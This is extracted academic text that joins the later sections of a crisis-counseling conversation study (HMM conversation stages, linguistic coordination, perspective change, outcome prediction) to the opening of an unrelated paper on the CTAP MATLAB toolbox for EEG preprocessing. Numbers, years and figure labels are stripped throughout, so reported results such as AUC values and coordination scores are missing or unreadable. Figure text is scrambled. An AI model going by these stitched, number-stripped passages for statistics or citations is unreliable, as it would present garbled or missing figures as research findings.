ten, show the texter more appreciation, and use more hedges, but we did not find a significant difference with respect to responding with surprise. more successful less successful counselor quality # s im ila r co u n se lo r re a ct io n s conversation quality positive negative figure : more successful counselors use less com- mon/templated responses (after the texter first explains the situation). this suggests that they respond in a more creative way. there is no significant difference between positive and negative conversations. . response templates and creativity in section . , we observed that more successful counselors make use of certain templates (including check questions, checks for suicidal thoughts, affir- mation, and using hedges). while this could suggest that counselors should stick to such predefined tem- plates, we find that, in fact, more successful coun- selors do respond in more creative ways. we define a measure of how “templated” the counselors responses are by counting the number of similar responses in tf-idf space for the counselor reaction (c.f., section . ; again using a manually defined and validated threshold on cosine distance). figure shows that more successful counselors use less common/templated questions. this sug- gests that while more successful counselors ques- tions follow certain patterns, they are more creative in their response to each situation. this tailoring of responses requires more effort from the counselor, which is consistent with the results in figure that showed that more successful counselors put in more effort in composing longer messages as well. ensuring conversation progress after demonstrating content-level differences be- tween counselors, we now explore temporal differ- ences in how counselors progress through conversa- tions. using an unsupervised conversation model, we are able to discover distinct conversation stages and find differences between counselors in how they move through these stages. we further provide ev- idence that these differences could be related to power and authority by measuring linguistic coor- dination between the counselor and texter. . unsupervised conversation model counseling conversations follow a common struc- ture due to the nature of conversation as well as counselor training. typically, counselors first intro- duce themselves, get to know the texter and their situation, and then engage in constructive prob- lem solving. we employ unsupervised conversation modeling techniques to capture this stage-like struc- ture within conversations. our conversation model is a message-level hid- den markov model (hmm). figure illustrates the basic model where hidden states of the hmm rep- resent conversation stages. unlike in prior work on conversation modeling, we impose a fixed ordering on the stages and only allow transitions from the cur- rent stage to the next one (figure ). this causes it to learn a fixed dialogue structure common to all of the counseling sessions as opposed to conversa- tion topics. furthermore, we separately model coun- selor and texter messages by treating their turns in the conversation as distinct states. we train the con- versation model with expectation maximization, us- ing the forward-backward algorithm to produce the distributions during each expectation step. we ini- tialized the model with each stage producing mes- sages according to a unigram distribution estimated from all messages in the dataset and uniform transi- tion probabilities. the unigram language models are defined over all words occurring more than times (over % of words in the dataset), with other words replaced by an unknown token. results. we explored training the model with vari- ous numbers of stages and found five stages to pro- duce a distinct and easily interpretable representa- tion of a conversation’s progress. table shows the words most unique to each stage. the first and last stages consist of the basic introductions and wrap- ups common to all conversations. in stage , the texter introduces the main issue, while the counselor asks for clarifications and expresses empathy for the situation. in stage , the counselor and texter dis- cuss the problem, particularly in relation to the other s ck ws w ,i s s w ,i w ,i ws ws figure : our conversation model generates a particular conversation ck by first generating a sequence of hid- den states s , s , ... according to a markov model. each state si then generates a message as a bag of words wi, , wi, , ... according a unigram language model wsi . counselor turn texter turn stage c stage stage k c ck t t tk figure : allowed state transitions for the conversation model. counselor and texter messages are produced by distinct states and conversations must progress through the stages in increasing order. people involved. in stage , the counselor and tex- ter discuss actionable strategies that could help the texter. this is a well-known part of crisis counselor training called “collaborative problem solving.” . analyzing counselor progression do counselors differ in how much time they spend at each stage? in order to explore how counselors progress through the stages, we use the viterbi al- gorithm to assign each conversation the most likely sequence of stages according to our conversation model. we then compute the average duration in messages of each stage for both more and less suc- cessful counselors. we control for the different distributions of positive and negative conversations among more successful and less successful coun- selors by giving the two classes of conversations equal weight and control for different conversation lengths by only including conversations between and messages long. results. we find that more successful counselors are quicker to move past the earlier stages, partic- stage interpretation top words for texter top words for counselor introductions hi, hello, name, listen, hey hi, name, hello, hey, brings problem introduction dating, moved, date, liked, ended gosh, terrible, hurtful, painful, ago problem exploration knows, worry, burden, teacher, group react, cares, considered, supportive, wants problem solving write, writing, music, reading, play hobbies, writing, activities, distract, music wrap up goodnight, bye, thank, thanks, appreciate goodnight, , anytime, luck, table : the top words for counselors and texters with greatest increase in likelihood of appearing in each stage. the model successfully identifies interpretable stages consistent with counseling guidelines (qualitative interpretation based on stage assignment and model parameters; only words occurring more than five hundred times are shown). stage . . . . . . . . . s ta ge d ur at io n (p er ce nt o f c on ve rs at io n) more successful counselors less successful counselors figure : more successful counselors are quicker to get to know texter and issue (stage ) and use more of their time in the “problem solving” phase (stage ). ularly stage , and spend more time in later stages, particularly stage (figure ). this suggests they are able to more quickly get to know the texter and then spend more time in the problem solving phase of the conversation, which could be one of the rea- sons they are more successful. . coordination and power differences one possible explanation for the more successful counselors’ ability to quickly move through the early stages is that they have more “power” in the conversation and can thus exert more control over the progression of the conversation. we explore this idea by analyzing linguistic coordination, which measures how much the conversation partners adapt to each other’s conversational styles. research has shown that conversation participants who have a greater position of power coordinate less (i.e., they do not adapt their linguistic style to mimic the other conversational participant as strongly) (danescu- niculescu-mizil et al., ). in our analysis, we use the “aggregated ” coordi- nation measure c(b, a) from danescu-niculescu- mizil ( ), which measures how much group b coordinates to group a (a higher number means more coordination). the measure is computed by counting how often specific markers (e.g., auxiliary verbs) are exhibited in conversations. if someone tends to use a particular marker right after their con- versation partner uses that marker, it suggests they are coordinating to their partner. formally, let set s be a set of exchanges, each involving an initial utterance u by a ∈ a and a reply u by b ∈ b. then the coordination of b to a according to a linguistic marker m is: cm(b, a) = p(emu →u |e m u )−p(emu →u ) where emu is the event that utterance u exhibits m (i.e., contains a word from category m) and emu →u is the event that reply u to u exhibits m. the prob- abilities are estimated across all exchanges in s. to aggregate across different markers, we average the coordination values of cm(b, a) over all markers m to get a macro-average c(b, a). the coordination between groups b and a is then defined as the mean of the coordinations of all members of group b to- wards the group a. we use eight markers from danescu-niculescu- mizil ( ), which are considered to be processed by humans in a generally non-conscious fashion: ar- ticles, auxiliary verbs, conjunctions, high-frequency adverbs, indefinite pronouns, personal pronouns, prepositions, and quantifiers. results. texters coordinate less than coun- selors, with texters having a coordination value of c(texter, counselor)= . compared to the counselor’s c(counselor, texter)= . , suggest- ing that the texters hold more “power” in the conversation. however, more successful counselors coordinate less than less successful ones (c(more succ. counselors, texter)= . vs. c(less succ. counselors, texter)= . ). all differ- ences are statistically significant (p < . ; mann- whitney u test). this suggests that more successful counselors act with more control over the conversa- tion, which could explain why they are quicker to make it through the initial conversation stages. facilitating perspective change thus far, we have studied conversation dynamics and their relation to conversation success from the counselor perspective. in this section, we show that perspective change in the texter over time is asso- ciated with a higher likelihood of conversation suc- cess. prior work has shown that day-to-day changes in writing style are associated with positive health outcomes (campbell and pennebaker, ), and existing theories link depression to a negative view of the future (pyszczynski et al., ) and a self- focusing style (pyszczynski and greenberg, ). here, we propose a novel measure to quantify three orthogonal aspects of perspective change within a single conversation: time, self, and sentiment. fur- ther, we show that the counselor might be able to actively induce perspective change. time. texters start explaining their issue largely in terms of the past and present but over time talk more about the future (see figure a; each plot shows the relative amount of words in the liwc past, present, and future categories (tausczik and pennebaker, )). we find that texters writing more about the future are more likely to feel better after the conversation. this suggests that changing the perspective from issues in the past towards the future is associated with a higher likelihood of suc- cessfully working through the crisis. self. another important aspect of behavior change is to what degree the texter is able to change their perspective from talking about themselves to con- sidering others and potentially the effect of their sit- uation on others (pyszczynski and greenberg, ; campbell and pennebaker, ). we measure how much the texter is focused on themselves by the rela- tive amount of first person singular pronouns (i, me, mine) versus third person singular/plural pronouns (she, her, him / they, their), again using liwc. fig- ure b shows that a smaller amount of self-focus is associated with more successful conversations (pro- viding support for the self-focus model of depres- sion (pyszczynski and greenberg, )). we hy- pothesize that the lack of difference at the end of the conversation is due to conversation norms such as thanking the counselor (“i really appreciate it.”) even if the texter does not actually feel better. sentiment. lastly, we investigate how much a change in sentiment of the texter throughout the con- versation is associated with conversation success. we measure sentiment as the relative fraction of pos- itive words using the liwc posemo and negemo sentiment lexicons. the results in figure c show that texters always start out more negative (value be- low . ), but that the sentiment becomes more posi- tive over time for both positive and negative conver- sations. however, we find that the separation be- tween both groups grows larger over time, which suggests that a positive perspective change through- out the conversation is related to higher likelihood of conversation success. we find that both curves increase significantly at the very end of the con- versation. again, we attribute this to conversation norms such as thanking the counselor for listening even when the texter does not actually feel better. together with the result on talking about the fu- ture, these findings are consistent with the theory of pyszczynski et al. ( ) that depression is related to a negative view of the future. role of a counselor. given that positive conver- sations often exhibit perspective change, a natural question is how counselors can encourage perspec- tive change in the texter. we investigate this by ex- ploring the hypothesis that the texter will tend to talk more about something (e.g., the future), if the coun- selor first talks about it. we measure this tendency using the same coordination measures as section . except that instead of using stylistic liwc markers (e.g., auxiliary verbs, quantifiers), we use the liwc markers relevant to the particular aspect of perspec- tive change (e.g., future, heshe, posemo). in all cases we find a statistically significant (p < . ; mann-whitney u-test) increase in the likelihood of the texter using a liwc marker if the counselor used it in the previous message (~ - % change). this link between perspective change and how the counselor conducts the conversation suggests that the coun- selor might be able to actively induce measurable perspective change in the texter. - - - - - ortion of fonversation (% of pessages) . . . . . . . . . . ) ut ur e re la tiv e fr eq ue nf y ositive fonversations egative fonversations - - - - - ortion of conversation (% of pessages) . . . . . . . . . . as t r el at iv e fr eq ue nc y ositive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . . . . . . p re se nt r el at iv e fr eq ue nc y positive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . el f r el at iv e fr eq ue nc y positive conversations egative conversations - - - - - portion of conversation (% of pessages) . . . . . p os ep o re la tiv e fr eq ue nc y positive conversations egative conversations a : past b: self c: sentiment a : present a : future figure : a: throughout the conversation there is a shift from talking about the past to future, where in positive conversations this shift is greater; b: texters that talk more about others more often feel better after the conversation; c: more positive sentiment by the texter throughout the conversation is associated with successful conversations. predicting counseling success in this section, we combine our quantitative insights into a prediction task. we show that the linguistic as- pects of crisis counseling explored in previous sec- tions have predictive power at the level of individ- ual conversations by evaluating their effectiveness as features in classifying the outcome of conversations. specifically, we create a balanced dataset of positive and negative conversations more than messages long and train a logistic regression model to predict the outcome given the first x% of messages in the conversation. there are such negative conver- sations and and we randomly subsample the larger set of positive conversations. we train the model with batch gradient descent and use l regulariza- tion when n-gram features are present and l reg- ularization otherwise. we evaluate our model with -fold cross-validation and compare models using the area under the roc curve (auc). features. we include three aspects of counselor messages discussed in section : hedges, check questions, and the similarity between the counselor’s message and previous texter message. we add a measure of how much progress the counselor has made (section ) by computing the viterbi path of stages for the conversation (only for the first x%) with the hmm conversation model and then adding the duration of each stage (in #messages) as a fea- ture. additionally, we add average message length . . . . . . . . . percent of conversation seen by the model . . . . . . . . . r o c a re a un de r th e cu rv e sc or e full model n-gram features only figure : prediction accuracies vs. percent of the con- versation seen by the model (without texter features). and average sentiment per message using vader sentiment (hutto and gilbert, ). further, we add temporal dynamics to the model by adding fea- ture conjunctions with the stages hmm model. af- ter running the stages model over the x% of the con- versation available to the classifier, we add each fea- ture’s average value over each stage as additional features. lastly, we explore the benefits of adding surface-level text features to the model by adding unigram and bigram features. because the focus of this work is on counseling strategies, we primar- ily experiment with models using only features from counselor messages. for completeness, we also re- port results for a model including texter features. prediction results. the model’s accuracy increases with x, and we show that the model is able to dis- features roc auc counselor unigrams only . counselor unigrams and bigrams only . none . + hedges . (+ . ) + check questions . (+ . ) + similarity to last message . (+ . ) + duration of each stage . (+ . ) + sentiment . (+ . ) + message length . (+ . ) + stages feature conjunction . (+ . ) + counselor unigrams and bigrams . (+ . ) + texter unigrams and bigrams . (+ . ) table : performance of nested models predicting con- versation outcome given the first % of the conversa- tion. in bold: full models with only counselor features and with additional texter features. tinguish positive and negative conversations after only seeing the first % of the conversation (see figure ). we attribute the significant increase in performance for x = (accuracy= . , auc= . ) to strong linguistic cues that appear as a conversation wraps up (e.g., “i’m glad you feel better.”). to avoid this issue, our detailed feature analysis is performed at x = . feature analysis. the model performance as fea- tures are incrementally added to the model is shown in table . all features improve model accuracy sig- nificantly (p < . ; paired bootstrap resampling test). adding n-gram features produces the largest boost in auc and significantly improves over a model just using n-gram features ( . vs. . auc). note that most features in the full model are based on word frequency counts that can be derived from n-grams which explains why a simple n-gram model already performs quite well. however, our model performs well with only a small set of lin- guistic features, demonstrating they provide a sub- stantial amount of the predictive power. the effec- tiveness of these features shows that, in addition to exhibiting group-level differences reported earlier in this paper, they provide useful signal for predicting the outcome of individual conversations. conclusion & future work knowledge about how to conduct a successful coun- seling conversation has been limited by the fact that studies have remained largely qualitative and small- scale. in this work, we presented a large-scale quan- titative study on the discourse of counseling con- versations. we developed a set of novel computa- tional discourse analysis methods suited for large- scale datasets and used them to discover actionable conversation strategies that are associated with bet- ter conversation outcomes. we hope that this work will inspire future generations of tools available to people in crisis as well as their counselors. for ex- ample, our insights could help improve counselor training and give rise to real-time counseling qual- ity monitoring and answer suggestion support tools. acknowledgements. we thank bob filbin for fa- cilitating the research, cristian danescu-niculescu- mizil for many helpful discussions, and dan ju- rafsky, chris manning, justin cheng, peter clark, david hallac, caroline suen, yilun wang and the anonymous reviewers for their valuable feedback on the manuscript. this research has been sup- ported in part by nsf cns- , iis- , nih bd k, aro muri, darpa xdata, darpa simplex, stanford data science initiative, boe- ing, lightspeed, sap, and volkswagen. references tim althoff and jure leskovec. . donor retention in online crowdfunding communities: a case study of donorschoose.org. in www. tim althoff, cristian danescu-niculescu-mizil, and dan jurafsky. . how to ask for a favor: a case study on the success of altruistic requests. in icwsm. vikas ganjigunte ashok, song feng, and yejin choi. . success with style: using writing style to pre- dict the success of novels. in emnlp. regina barzilay and lillian lee. . catching the drift: probabilistic content models, with applications to generation and summarization. in hlt-naacl. aaron t. beck. . depression: clinical, experimen- tal, and theoretical aspects. university of pennsylva- nia press. philip bramsen, martha escobar-molano, ami patel, and rafael alonso. . extracting social power rela- tionships from natural language. in hlt-naacl. marc brysbaert, amy beth warriner, and victor kuper- man. . concreteness ratings for thousand generally known english word lemmas. behavior re- search methods, ( ). r. sherlock campbell and james w. pennebaker. . the secret life of pronouns: flexibility in writing style and physical health. psychological science, ( ). ge chen. . visualizations for mental health topic models. master’s thesis, mit. cristian danescu-niculescu-mizil, lillian lee, bo pang, and jon kleinberg. . echoes of power: language effects and power differences in social interaction. in www. cristian danescu-niculescu-mizil. . a computa- tional approach to linguistic style coordination. ph.d. thesis, cornell university. karthik dinakar, allison j.b. chaney, henry lieberman, and david m. blei. a. real-time topic models for crisis counseling. in kdd dssg workshop. karthik dinakar, emily weinstein, henry lieberman, and robert selman. b. stacked generalization learning to analyze teenage distress. in icwsm. karthik dinakar, jackie chen, henry lieberman, ros- alind picard, and robert filbin. . mixed- initiative real-time topic modeling & visualization for crisis counseling. in acm iciui. marco guerini, alberto pepe, and bruno lepri. . do linguistic style and readability of scientific ab- stracts affect their virality? in icwsm. shane haberstroh, thelma duffey, marcheta evans, robert gee, and heather trepal. . the experi- ence of online counseling. journal of mental health counseling, ( ). christine howes, matthew purver, and rose mccabe. . linguistic indicators of severity and progress in online text-based therapy for depression. clpsych workshop at acl . rongyao huang. . language use in teenage crisis intervention and the immediate outcome: a machine automated analysis of large scale text data. master’s thesis, columbia university. c.j. hutto and eric gilbert. . vader: a parsimo- nious rule-based model for sentiment analysis of social media text. in icwsm. thomas r. insel. . assessing the economic costs of serious mental illness. the american journal of psychiatry, ( ). john kalafat, madelyn gould, jimmie lou harris mun- fakh, and marjorie kleinman. . an evaluation of crisis hotline outcomes part : nonsuicidal crisis callers. suicide and life-threatening behavior, ( ). william labov and david fanshel. . therapeutic discourse: psychotherapy as conversation. dana heller levitt and jodi d. jacques. . promot- ing tolerance for ambiguity in counselor training pro- grams. the journal of humanistic counseling, edu- cation and development, ( ). tomas mikolov, ilya sutskever, kai chen, greg cor- rado, and jeff dean. . distributed representa- tions of words and phrases and their compositionality. in nips. national institute of mental health. . any mental illness (ami) among u.s. adults. http://www.nimh.nih.gov/health/ statistics/prevalence/any-mental- illness-ami-among-us-adults.shtml. retrieved june , . kate g. niederhoffer and james w. pennebaker. . linguistic style matching in social interaction. jour- nal of language and social psychology, ( ). michael j. paul. . mixed membership markov models for unsupervised conversation modeling. in emnlp-conll. james w. pennebaker, matthias r. mehl, and kate g. niederhoffer. . psychological aspects of natural language use: our words, our selves. annual review of psychology, ( ). john p. pestian, pawel matykiewicz, michelle linn-gust, brett south, ozlem uzuner, jan wiebe, kevin b. co- hen, john hurdle, and christopher brew. . senti- ment analysis of suicide notes: a shared task. biomed- ical informatics insights, (suppl. ). tom pyszczynski and jeff greenberg. . self- regulatory perseveration and the depressive self- focusing style: a self-awareness theory of reactive de- pression. psychological bulletin, ( ). tom pyszczynski, kathleen holt, and jeff greenberg. . depression, self-focused attention, and ex- pectancies for positive and negative future life events for self and others. journal of personality and social psychology, ( ). nairan ramirez-esparza, cindy chung, ewa kacewicz, and james w. pennebaker. . the psychology of word use in depression forums in english and in span- ish: testing two text analytic approaches. in icwsm. shiquan ren, hong lai, wenjing tong, mostafa amin- zadeh, xuezhang hou, and shenghan lai. . non- parametric bootstrapping for hierarchical data. jour- nal of applied statistics, ( ). alan ritter, colin cherry, and bill dolan. . unsu- pervised modeling of twitter conversations. in hlt- naacl. harvey sacks and gail jefferson. . lectures on con- versation. wiley-blackwell. andreas stolcke, klaus ries, noah coccaro, eliza- beth shriberg, rebecca bates, daniel jurafsky, paul taylor, rachel martin, carol van ess-dykema, and marie meteer. . dialogue act modeling for automatic tagging and recognition of conversational speech. computational linguistics, ( ). yla r. tausczik and james w. pennebaker. . the psychological meaning of words: liwc and comput- erized text analysis methods. journal of language and social psychology, ( ). http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml http://www.nimh.nih.gov/health/statistics/prevalence/any-mental-illness-ami-among-us-adults.shtml teun van dijk. . discourse studies: a multidisci- plinary approach. sage. world health organization. . depression: fact sheet no . http://www.who.int/ mediacentre/factsheets/fs /en/. re- trieved november , . jaewon yang, julian mcauley, jure leskovec, paea lependu, and nigam shah. . finding pro- gression stages in time-evolving event sequences. in www. http://www.who.int/mediacentre/factsheets/fs /en/ http://www.who.int/mediacentre/factsheets/fs /en/ introduction related work dataset description defining counseling quality counselor adaptability reacting to ambiguity initial ambiguity and situation setter how to respond to ambiguity response templates and creativity ensuring conversation progress unsupervised conversation model analyzing counselor progression coordination and power differences facilitating perspective change predicting counseling success conclusion & future work computational testing for automated preprocessing: a matlab toolbox to enable large scale electroencephalography data processing computational testing for automated preprocessing: a matlab toolbox to enable large scale electroencephalography data processing benjamin u. cowley , , jussi korpela and jari torniainen brainwork research centre, finnish institute of occupational health, helsinki, finland cognitive brain research unit, faculty of medicine, university of helsinki, helsinki, finland biophysics of bone and cartilage group, department of applied physics, university of eastern finland, kuopio, finland abstract electroencephalography (eeg) is a rich source of information regarding brain function. however, the preprocessing of eeg data can be quite complicated, due to several factors. for example, the distinction between true neural sources and noise is indeterminate; eeg data can also be very large. the various factors create a large number of subjective decisions with consequent risk of compound error. existing tools present the experimenter with a large choice of analysis methods. yet it remains a challenge for the researcher to integrate methods for batch-processing of the average large datasets, and compare methods to choose an optimal approach across the many possible parameter configurations. additionally, many tools still require a high degree of manual decision making for, e.g. the classification of artefacts in channels, epochs or segments. this introduces extra subjectivity, is slow and is not reproducible. batching and well-designed automation can help to regularise eeg preprocessing, and thus reduce human effort, subjectivity and consequent error. we present the computational testing for automated preprocessing (ctap) toolbox, to facilitate: (i) batch-processing that is easy for experts and novices alike; (ii) testing and manual comparison of preprocessing methods. ctap extends the existing data structure and functions from the well-known eeglab toolbox, based on matlab and produces extensive quality control outputs. ctap is available under mit licence from https://github.com/bwrc/ctap. subjects bioinformatics, brain–computer interface keywords computation, testing, automation, preprocessing, eeglab, electroencephalography, signal processing introduction measurement of human electroencephalography (eeg) is a rich source of information regarding certain aspects of brain functioning, and is the most lightweight and affordable method of brain imaging. although it can be possible to see certain large effects without preprocessing at all, in the general-case eeg analysis requires careful preprocessing, with some degree of trial-and-error. such difficult eeg preprocessing needs to be supported with appropriate tools. the kinds of tools required for signal processing depends on the properties of data, and the general-case properties of eeg are demanding: large datasets and indeterminate data contribute to the number and complexity of operations. how to cite this article cowley et al. ( ), computational testing for automated preprocessing: a matlab toolbox to enable large scale electroencephalography data processing. peerj comput. sci. :e ; doi . /peerj-cs. submitted june accepted february published march corresponding author benjamin u. cowley, benjamin.cowley@ttl.fi academic editor bertram ludäscher additional information and declarations can be found on page doi . /peerj-cs. copyright cowley et al. distributed under creative commons cc-by . https://github.com/bwrc/ctap http://dx.doi.org/ . /peerj-cs. mailto:benjamin.�cowley@�ttl.�fi https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ in most research applications eeg data can be very large; systems are available with over channels. this can result in the need to examine thousands or tens of thousands of data-points; for instance, visual examination of raw data quality for subjects � channels � , s ≅ , plot windows (where each window shows channels � s). also, normally eeg can require many operations (see e.g. cowley et al., for a review), such as referencing, event-handling, filtering, dimensional reduction and artefact detection in channels, epochs or otherwise; all of which is time- consuming and therefore costly. many of these operations require repeated human judgements, e.g. selection of artefactual independent components (ics) (chaumon, bishop & busch, ), leading to subjectivity, non-reproducibility of outcomes and non-uniformity of decisions. nor is it possible that all such operations can ever be completely automated, as it is not possible to provide a ground-truth for computational methods by uniquely determination of the neural sources of eeg. with many relatively complex standard operations, code for eeg processing can also be harder to debug (widmann & schröger, ). these issues illustrate the need for a software tool, a workflow management system, that helps to integrate the wealth of existing methods. some standards have been suggested (keil et al., ), however bigdely-shamlo et al. ( ) have pointed out that ‘artefact removal and validation of processing approaches remain a long-standing open problem for eeg’. the eeglab toolbox (delorme & makeig, ) and its various plug-ins provide a wealth of functions, but in this ecosystem it remains difficult and time-consuming to build the necessary infrastructure to manage, regularise and streamline eeg preprocessing. a workflow management system for data-processing pipelines helps to ensure that the researcher/analyst saves most of their cognitive effort for choosing analysis steps (not implementing them) and assessing their outcome (not debugging them). a regularised workflow maximises the degree to which each file is treated the same— for eeg this means to minimise drift in file-wise subjective judgements, such as estimating the accuracy of artefact detection algorithm(s) by visual inspection. a streamlined workflow can be enabled by separating the building of functions (for analysis or data management) from exploring and tuning the data. these features improve reproducibility and separate the menial from the important tasks. to meet these needs, in this paper we present the computational testing for automated preprocessing (ctap) toolbox. approach the ctap toolbox is available as a github repository at https://github.com/bwrc/ctap. it is built on matlab (r a and higher) and eeglab v . . b; limited functions, especially non-graphical, may work on older versions but are untested. the aim of ctap is to regularise and streamline eeg preprocessing in the eeglab ecosystem. in practice, the ctap toolbox extends eeglab to provide functionality for: (i) batch-processing using scripted eeglab-compatible functions; (ii) testing and cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/bwrc/ctap http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ comparison of preprocessing methods based on extensive quality control outputs. the key benefits include: � ability to run a subset of a larger analysis � bookkeeping of intermediate result files � error handling � visualisations of the effects of analysis steps � simple to customise and extend � reusable code � feature and raw data export we will next briefly motivate each of the benefits above. incomplete runs: a frequent task is to make a partial run of a larger analysis. this happens, for example, when new data arrives or when the analysis fails for a few measurements. the incomplete run might involve a subset of (a) subjects, (b) measurements, (c) analysis branches, (d) collections of analysis steps, (e) single steps; or any combination of these. ctap provides tools to make these partial runs while keeping track of the intermediate saves. bookkeeping: a given eeg analysis workflow can have several steps, branches to explore alternatives and a frequent need to reorganise analysis steps or to add additional steps in between. combined with incomplete runs, these requirements call for a system that can find the correct input file based on step order alone. ctap does this and saves researchers time and energy for more productive tasks. error handling: frequently, simple coding errors or abnormal measurements can cause a long batch run to fail midway. ctap catches such errors, saves their content into log files for later reference and continues the batch run. for debugging purposes it is also possible to override this behaviour and use matlab’s built-in debugging tools to solve the issue. visualisations: it is always good practice to check how the analysis alters the data. ctap provides several basic visualisations for this task giving the user additional insight into what is going on. see ‘results’ for examples. customisation: in research it is vital to be able to customise and extend the tools in use. extending ctap with custom functions is easy as the interface that ctap_�.m functions must implement is simple. intermediate results are stored in eeglab format and can be directly opened with the eeglab graphical user interface (gui) for inspection or manual processing. code reuse: the ctap_�.m functions act as wrappers that make it possible to combine methods to build analysis workflows. most analysis steps are actually implemented as standalone functions, such that they can be used also outside ctap. in contrast to eeglab, ctap functions do not pop-up configuration windows that interfere with automated workflows. export facilities: exporting results might prove time-consuming in matlab as there are no high-level tools to work with mixed text and numeric data. to this end, ctap provides its own format of storing data and several export options. small datasets can be cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ exported as, e.g. comma delimited text (csv) while larger sets are more practically saved in an sqlite database. ctap also offers the possibility to store single-trial and average event-related potential (erp) data in hdf format, which makes the export to r and python simple. in summary, ctap lets the user focus on content, instead of time-consuming implementation of foundation functionality. in the rest of the paper, we describe how ctap toolbox does this using a synthetic dataset as a running example. we start with related work followed by the ‘materials and methods’ section detailing the architecture and usage of ctap. the ‘results’ section then describes the technical details and outcomes of a motivating example application. in the ‘discussion’ section we set out the philosophy and possible uses of ctap toolbox, including development as well as preprocessing; and describe issues and potential directions for future work. related work many methods are available from the literature to facilitate automated preprocessing (agapov et al., ; baillet et al., ; barua & begum, ), and the rate of new contributions is also high. in a milestone special issue (baillet, friston & oostenveld, ) gathered many of the academic contributions available at that time. this special issue is quite skewed towards tools for feature extraction, which illustrates again the need for better/more up-to-date solutions for the fundamental stages of eeg processing. among tools dedicated to eeg processing, eeglab stands out for its large user community and high number of third-party contributors, to the degree that it is considered by some to be a de facto standard. although eeglab functions can be called from the command-line interface and thus built into a preprocessing pipeline by the user’s own scripts, in practice this is a non-trivial error-prone task. other popular tools focus on a more diverse set of signals, especially including magnetoencephalography (meg). brainstorm (tadel et al., ), fieldtrip (oostenveld etal., ) and emegs (electromagnetic encaphalography software) (peyk, de cesarei & junghöfer, ) are all open source tools for eeg and meg data analysis. brainstorm in particular, but also the others, have originated with an emphasis on cortical source estimation techniques and their integration with anatomical data. like eeglab, these tools are all free and open source, but based on the commercial platform matlab (natick, ma, usa), which can be a limitation in some contexts due to high licence cost. the most notable commercial tool is brainvision analyzer (brain products gmbh, munich, germany), a graphical programming interface with a large number of features. tools which are completely free and open source are fewer in number and have received much less supplemental input from third parties. python tools include mne-python for processing meg and eeg data (gramfort et al., ) and pyeeg (bao, liu & zhang, ), a module for eeg feature extraction. mne, like brainstorm and fieldtrip, is primarily aimed at integrating eeg and meg data. several packages exist for the r computing environment, e.g. (tremblay & newman, ), however these do not seem to be intended as general-purpose tools. for example, we conducted a search of the scopus database for articles pub- lished after , with “eeg” and “electroencephalography” in the title, abstract or keywords, plus “signal processing” or “signal processing, computer-assisted” in keywords, and restricted to subject areas “neuroscience”, “engineering” or “computer science”. the search returned over hits, growing year-by- year from in up to a mean value of between and . cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ however, ctap was designed to complement the existing eeglab ecosystem, not to provide a stand-alone preprocessing tool. this is an important distinction, because there exist some excellent stand-alone tools which work across data formats and platforms (bellec et al., ; ovaska et al., ) ; these features are valuable when collaborators are trying to work across, e.g. windows and linux, matlab and python. however, we do not see a need in this domain; rather we see a need in the much narrower focus on improving the command-line interface batch-processing capabilities of eeglab. we have chosen to extend eeglab because it has received many contributions to the core functionality, and is thus compatible with a good portion of the methods of eeg processing from the literature. some compatible tools from the creators of eeglab at the swartz centre for computational neuroscience (sccn) are detailed in (delorme et al., ), including tools for forward head modelling, estimating source connectivity and online signal processing. other key third-party preprocessing contributions to eeglab include sasica (chaumon, bishop & busch, ), faster (nolan, whelan & reilly, ) and adjust (mognon et al., ), all semi-automated solutions for selection of artefactual data. in terms of similar tools bigdely-shamlo et al. ( ) released the prep pipeline for matlab, which also uses the eeglab data structure. prep introduces specific important functionality for referencing the data, line noise removal and detecting bad channels. prep is aimed only at experiment-induced artefacts and not those deriving from subject- activity such as, e.g. blinks, and is designed to be complementary to the various algorithm toolboxes for artefact-removal by focusing on early-stage processing. in similar vein, ctap is intended to be complementary to existing toolboxes including prep. for example, methods from faster and adjustare featured in ctap as options for detecting bad data. this integration of existing solutions illustrates one core principle of ctap: it aims to extend an existing rich ecosystem of eeg-specific methods, by meeting a clear need within that ecosystem for a workflow management system. the ready-made automation of batching and bookkeeping gives the user a distinct advantage over the common approach of ‘eeglab + a few scripts’, which seems simple on its face, but in practice is non-trivial as the number and complexity of operations grows. as all algorithms added to ctap will produce quality control outputs automatically, fast performance comparison is possible between methods or method parameters, speeding the discovery of (locally) optimal solutions. the system has potential to enable such parameter optimisation by automated methods, although this is not yet implemented. materials and methods the core activity of ctap is preprocessing eeg data by cleaning artefacts, i.e. detection and either correction or removal of data that is not likely to be attributable to neural sources. ctap is able to operate on three different temporal granularities: channel, epoch and segment. channel operations affect the entire time series at one spatial location. epoch operations are performed on one or several epochs produced by eeglab epoching function. finally, segments are fixed time-windows around specific events which can be extracted from both channel and epoch levels, see fig. . an example of a typical segment also neuropype, a commercial python- based graphical programming environ- ment for physiological signal processing. however, to the authors’ knowledge, it has not been documented in a peer reviewed publication. cowley et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ could be a blink artefact with a window wide enough to include the entire blink waveform. further functionality is provided for independent component analysis (ica)-based methods. artefact-detection methods based on some flavour of ica algorithm have been shown to outperform temporal approaches (delorme, sejnowski & makeig, ). it was also shown that ics are valid representations of neural sources (delorme et al., ). ctap can thus help to combine the existing methods for eeg signal processing. outline of usage figure shows the core components of ctap. the coloured boxes represent entities that the user has to specify in order to use ctap. these are: � what analysis functions to apply and in which order (analysis pipe) � analysis environment and parameters for the analysis functions (configuration) � which eeg measurements/files to process (measurement configuration) typically, the analysis is run by calling a single script that defines all of the above and passes these on to the ctap_pipeline_looper.m function, that performs all requested analysis steps on all specified measurements. in the following, we describe in more detail how the configurations are made, how the pipe is executed, what outputs it provides and what options the user has to control the pipe. the complete details of all these 